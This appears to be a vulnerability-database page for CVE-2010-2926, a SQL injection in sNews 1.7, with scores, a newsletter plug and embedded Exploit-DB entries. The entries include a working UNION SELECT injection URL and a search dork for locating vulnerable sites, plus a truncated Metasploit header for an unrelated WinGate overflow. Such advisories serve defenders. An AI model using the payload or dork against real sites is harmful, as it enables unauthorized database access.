CVE-2010-2926
published 2010-07-30CVE-2010-2926: SQL injection vulnerability in index.php in sNews 1.7 allows remote attackers to execute arbitrary SQL commands via the category parameter.
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.91%
55.4th percentile
SQL injection vulnerability in index.php in sNews 1.7 allows remote attackers to execute arbitrary SQL commands via the category parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solucija | snews | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2006-2926 QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)
QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)
---
##
# $Id: qbik_wingate_wwwproxy.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Qbik WinGate version
6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the
HTTP proxy service on port 80, a remote attacker could overflow
a buffer and execute arbitrary code.
},
'Author' => 'patrick',
'License' => MSF
Exploit-DB
sNews 1.7 - 'index.php?category' SQL Injection
exploitdb·2010-07-24
CVE-2010-2926 sNews 1.7 - 'index.php?category' SQL Injection
sNews 1.7 - 'index.php?category' SQL Injection
---
########################################################################################
sNews v1.7 (index.php?category) SQL Injection Vulnerability
########################################################################################
Author : CoBRa_21
Author Web Page : http://www.ipbul.org
Dork: "Powered by sNews"
########################################################################################
Sql Injection:
http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8
########################################################################################
Thanks http://e-banka.org & http://www.cyber-warrior.org
###################################################################################
No writeups or analysis indexed.
2010-07-30
Published